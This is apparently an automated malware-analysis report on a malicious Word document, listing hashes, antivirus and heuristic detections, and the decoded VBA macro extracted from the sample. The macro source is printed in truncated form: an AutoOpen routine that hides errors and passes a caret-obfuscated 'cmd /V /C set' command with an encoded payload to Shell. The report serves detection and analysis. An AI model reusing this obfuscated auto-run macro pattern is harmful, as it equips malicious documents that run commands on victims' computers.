Office (OLE) malware analysis — malicious · 92f3ebd2db671fd9

MALICIOUS

Office (OLE)

80.9 KB Created: 2018-08-31 15:08:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: f41b08ccf950ad4b2e52d0c9e6006c2f SHA-1: a9bce9a34e885cfc837258c941f384e01e29191a SHA-256: 92f3ebd2db671fd9743ca5401d8ce8b59ba698bd2e90b25a13a8640f30a25664

202 Risk Score

Heuristics 6

ClamAV: Doc.Malware.Ddzs-6691544-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Ddzs-6691544-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9608 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9608 bytes
SHA-256: `53bfcfd1b2d2888939d96f4865eb68526f822f83478f389033ebf0f25eae5d6b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "NhhDcPmmSlWJ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour jqSjKc * raliL Hour OpDOD * 76984 / GiQzup / 11541 Hour 25781 / ETYwa Shell KeyString(4 + 4 + 10 + 2 + 47) + HRfHCubPYuXiaV + FqdVhWqOdMCmQm + RLRMqjz + vwWisvQ + OZPKBuF + indGw + vNOVisPLr + zrXumvLvc + tCYDvDwkPvI, 10 - 10 Hour aRiqro * ljFkiz * 99071 * 16827 Hour 60794 / sirzLE End Sub Attribute VB_Name = "jRCvWpfn" Function RLRMqjz() On _ Error _ Resume _ Next Hour 25715 / 24185 * 69982 / zLaGGw Hour VCYAtz * UUrov Hour 11009 / RSZLR AbOXhPaPf = "md /V" + "^:" + "/C" + Chr(2 + 2 + 3 + 0 + 27) + "^s^" + "e^t " + "^Gg" + "^a=" + "A^A" + "CA^gAA" + "I^" + "A^AC" + "A" Hour bvdjz / cqCsXu Hour Pksjwn * sjNcq * uXXfXl / 22904 Hour 30276 / 86043 * 22506 / HVFsr Hour qzZLNL * nklzm / mPHUA / Jqihk mlDAfocKq = "g^AA" + "IA" + "AC^A" + "^g^A" + "A" + "^IA^" Hour zTzRc * stOIV / kHfNDT / BbnCkb Hour hGCnP / KisZmu Hour 96637 / VGSia / 26639 * QwVicq kfQQDmaw = "ACA" + "^g^AA" + "IA^ACA" + "^g^A^" + "AIA^AC" Hour 28926 * rRSYIp * 81687 * 34210 Hour 24341 * QhkNL kYnIqzswI = "A^g^A" + "Qf^A^0H" + "A7^BA^a" + "AMGA" + "0^B" + "Q" Hour 39911 * YziZKX / 49422 / nSlAh Hour KXuEsP / QDltAI bmjSDGvow = "^Y^AMG" + "^A^" + "9^BwO^A" + "^sG" + "Ah" + "BQ^ZAI^" + "H^Ai^" + "B^wO^A^" + "o" + "^F^" Hour 74076 / 67046 / kRujtN * 71684 Hour ijSciG * 24845 * 54251 / LzOJo Hour iDbOiC * CnNWcO / jfoRXR * LjCEzN BzJLsilYOC = "A" + "JB^Ac^A" + "^QCA^g" + "^AQb" + "^AU^G^" + "A^0B" + "QS^A^" + "0CAl" + "^Bw^" + "a^A" Hour WdNEE / OwrSXY Hour Hqlbj / 68437 Hour 71786 * wbIjDA * 69794 * TCRFZC flKzFptHAp = "^" + "8^G^A2" + "Bg^b" + "^A" + "^k^E^A7" + "^A^Q" + "K^" + "A^oF^A^" Hour EdmopD * ZISif * 84976 * SlvtB Hour 81888 / vHvPhZ XrPjmFk = "JB^Ac" + "^AQC^A" + "gAA^" + "LA^YEA" + "h^B^wbA" + "QC" + "A^o^A^Q" + "Z^AwGA^" + "p^BgR" + "^AQGAh" Hour 24513 / jwzWz Hour 58068 / FfQkBr qjFZvEQYTD = "^B^" + "wb" + "^Aw^G^A" + "u^Bw" + "^d^A8G^" + "A" + "EB" + "g^LAY^" + "E" + "A" + "^S^B^gR" + "^" + "A^Q" Hour 34847 * oqWmtP Hour 44120 / TYVBmb Hour WjwCj * 78335 / 36753 / DcSQN Hour saWnPD * iwwJw * BPChKY * GEAzH kqrpujA = "C^A7" + "B" + "^" + "Q" + "e" + "AI^H^A" + "^0^B^" + "w^e" + "^AkCA^" Hour 67851 * VYoaWj Hour 73480 / wAtZHU YLuIfQNssX = "HBg^a^" + "Ac^H^A" + "^k" + "AA" + "I^A4^G" + "A^" Hour OuLhj * jblTi Hour 2867 * OmSXoP Hour 36488 / ZjmKQH / XmsfRz * NiFikL Hour 87911 / HnjwS * 48209 * wicPP Hour vrofo * itvubH / 76489 * Kajoan Hour qSsSu * dGmVb * 90183 / tZwNj APzCkQK = "p" + "^B^A" + "I^A^Y" + "^E^Ah^" + "Bwb^AQC" + "A^oAA^a" + "^A" + "^MG" + "^Ah" + "B^QZ" + "^AIHAv" + "Bg^" + "Z^A^sDA" RLRMqjz = AbOXhPaPf + mlDAfocKq + kfQQDmaw + kYnIqzswI + bmjSDGvow + BzJLsilYOC + flKzFptHAp + XrPjmFk + qjFZvEQYTD + kqrpujA + YLuIfQNssX + APzCkQK Hour 36000 * CzOkt * 72095 / fkiVI Hour pjORdZ / wsUFD Hour 21165 / TKVEwH Hour 60602 / fXjIK / 96751 / 62664 End Function Function vwWisvQ() On _ Error _ Resume _ Next Hour YIWKf / iBhvkw * 29196 * aNjEH JshOBwkIG = "nA" + "QZ^A" + "g" + "^H^A^l^" + "B^g^" + "LAcC" + "A" + "rAwRA^" Hour KXDOai * ifTdjs / KmNCG * ZPnUVR Hour vzLUDi * HRnUjv Hour 63065 * nzTzhp * mFQJR / DZXzpM aQZqa = "4^EAIBA" + "^J" + "AsCAn^" + "A" + "AXAcCAr" + "A^w" + "Y^Ak^" Hour 15845 / jhtNt Hour lGkKpc * 49398 Hour 67483 / LMIZw * kzmPkk * GjZvki sWUcMXd = "G^As" + "^B" + "^g" + "^Y^AU" + "HA" + "^wBg^OA" + "^Y^H^A" + "u^BQ" + "Z^A^" + "Q" + "C" + "^A^" + "9A^" Hour kWivvd * pqokU Hour MBTidP * phqwuc * 53189 / jmOuwi CYQMKYTAwGz = "g^W^A" + "^kEAw" + "^BAJ" + "^A^" + "sDA" + "n^A^A" + "N^" + "Ac" + "^D^Ax" + "Aw^J^A" + "ACA9^A" Hour 83957 / CJGtt NzvOSE = "^A^IAc" + "^EAOBA" + "^S^A" + "Q" + "C ... (truncated)

SHA-256: 53bfcfd1b2d2888939d96f4865eb68526f822f83478f389033ebf0f25eae5d6b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "NhhDcPmmSlWJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour jqSjKc * raliL
   Hour OpDOD * 76984 / GiQzup / 11541
   Hour 25781 / ETYwa
Shell KeyString(4 + 4 + 10 + 2 + 47) + HRfHCubPYuXiaV + FqdVhWqOdMCmQm + RLRMqjz + vwWisvQ + OZPKBuF + indGw + vNOVisPLr + zrXumvLvc + tCYDvDwkPvI, 10 - 10
   Hour aRiqro * ljFkiz * 99071 * 16827
   Hour 60794 / sirzLE
End Sub



Attribute VB_Name = "jRCvWpfn"
Function RLRMqjz()

On _
Error _
Resume _
Next
Hour 25715 / 24185 * 69982 / zLaGGw
   Hour VCYAtz * UUrov
   Hour 11009 / RSZLR
AbOXhPaPf = "md /V" + "^:" + "/C" + Chr(2 + 2 + 3 + 0 + 27) + "^s^" + "e^t " + "^Gg" + "^a=" + "A^A" + "CA^gAA" + "I^" + "A^AC" + "A"
Hour bvdjz / cqCsXu
   Hour Pksjwn * sjNcq * uXXfXl / 22904
   Hour 30276 / 86043 * 22506 / HVFsr
   Hour qzZLNL * nklzm / mPHUA / Jqihk
mlDAfocKq = "g^AA" + "IA" + "AC^A" + "^g^A" + "A" + "^IA^"
Hour zTzRc * stOIV / kHfNDT / BbnCkb
   Hour hGCnP / KisZmu
   Hour 96637 / VGSia / 26639 * QwVicq
kfQQDmaw = "ACA" + "^g^AA" + "IA^ACA" + "^g^A^" + "AIA^AC"
Hour 28926 * rRSYIp * 81687 * 34210
   Hour 24341 * QhkNL
kYnIqzswI = "A^g^A" + "Qf^A^0H" + "A7^BA^a" + "AMGA" + "0^B" + "Q"
Hour 39911 * YziZKX / 49422 / nSlAh
   Hour KXuEsP / QDltAI
bmjSDGvow = "^Y^AMG" + "^A^" + "9^BwO^A" + "^sG" + "Ah" + "BQ^ZAI^" + "H^Ai^" + "B^wO^A^" + "o" + "^F^"
Hour 74076 / 67046 / kRujtN * 71684
   Hour ijSciG * 24845 * 54251 / LzOJo
   Hour iDbOiC * CnNWcO / jfoRXR * LjCEzN
BzJLsilYOC = "A" + "JB^Ac^A" + "^QCA^g" + "^AQb" + "^AU^G^" + "A^0B" + "QS^A^" + "0CAl" + "^Bw^" + "a^A"
Hour WdNEE / OwrSXY
   Hour Hqlbj / 68437
   Hour 71786 * wbIjDA * 69794 * TCRFZC
flKzFptHAp = "^" + "8^G^A2" + "Bg^b" + "^A" + "^k^E^A7" + "^A^Q" + "K^" + "A^oF^A^"
Hour EdmopD * ZISif * 84976 * SlvtB
   Hour 81888 / vHvPhZ
XrPjmFk = "JB^Ac" + "^AQC^A" + "gAA^" + "LA^YEA" + "h^B^wbA" + "QC" + "A^o^A^Q" + "Z^AwGA^" + "p^BgR" + "^AQGAh"
Hour 24513 / jwzWz
   Hour 58068 / FfQkBr
qjFZvEQYTD = "^B^" + "wb" + "^Aw^G^A" + "u^Bw" + "^d^A8G^" + "A" + "EB" + "g^LAY^" + "E" + "A" + "^S^B^gR" + "^" + "A^Q"
Hour 34847 * oqWmtP
   Hour 44120 / TYVBmb
   Hour WjwCj * 78335 / 36753 / DcSQN
   Hour saWnPD * iwwJw * BPChKY * GEAzH
kqrpujA = "C^A7" + "B" + "^" + "Q" + "e" + "AI^H^A" + "^0^B^" + "w^e" + "^AkCA^"
Hour 67851 * VYoaWj
   Hour 73480 / wAtZHU
YLuIfQNssX = "HBg^a^" + "Ac^H^A" + "^k" + "AA" + "I^A4^G" + "A^"
Hour OuLhj * jblTi
   Hour 2867 * OmSXoP
   Hour 36488 / ZjmKQH / XmsfRz * NiFikL
   Hour 87911 / HnjwS * 48209 * wicPP
   Hour vrofo * itvubH / 76489 * Kajoan
   Hour qSsSu * dGmVb * 90183 / tZwNj
APzCkQK = "p" + "^B^A" + "I^A^Y" + "^E^Ah^" + "Bwb^AQC" + "A^oAA^a" + "^A" + "^MG" + "^Ah" + "B^QZ" + "^AIHAv" + "Bg^" + "Z^A^sDA"
RLRMqjz = AbOXhPaPf + mlDAfocKq + kfQQDmaw + kYnIqzswI + bmjSDGvow + BzJLsilYOC + flKzFptHAp + XrPjmFk + qjFZvEQYTD + kqrpujA + YLuIfQNssX + APzCkQK
   Hour 36000 * CzOkt * 72095 / fkiVI
   Hour pjORdZ / wsUFD
   Hour 21165 / TKVEwH
   Hour 60602 / fXjIK / 96751 / 62664
End Function
Function vwWisvQ()

On _
Error _
Resume _
Next
Hour YIWKf / iBhvkw * 29196 * aNjEH
JshOBwkIG = "nA" + "QZ^A" + "g" + "^H^A^l^" + "B^g^" + "LAcC" + "A" + "rAwRA^"
Hour KXDOai * ifTdjs / KmNCG * ZPnUVR
   Hour vzLUDi * HRnUjv
   Hour 63065 * nzTzhp * mFQJR / DZXzpM
aQZqa = "4^EAIBA" + "^J" + "AsCAn^" + "A" + "AXAcCAr" + "A^w" + "Y^Ak^"
Hour 15845 / jhtNt
   Hour lGkKpc * 49398
   Hour 67483 / LMIZw * kzmPkk * GjZvki
sWUcMXd = "G^As" + "^B" + "^g" + "^Y^AU" + "HA" + "^wBg^OA" + "^Y^H^A" + "u^BQ" + "Z^A^" + "Q" + "C" + "^A^" + "9A^"
Hour kWivvd * pqokU
   Hour MBTidP * phqwuc * 53189 / jmOuwi
CYQMKYTAwGz = "g^W^A" + "^kEAw" + "^BAJ" + "^A^" + "sDA" + "n^A^A" + "N^" + "Ac" + "^D^Ax" + "Aw^J^A" + "ACA9^A"
Hour 83957 / CJGtt
NzvOSE = "^A^IAc" + "^EAOBA" + "^S^A" + "Q" + "C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.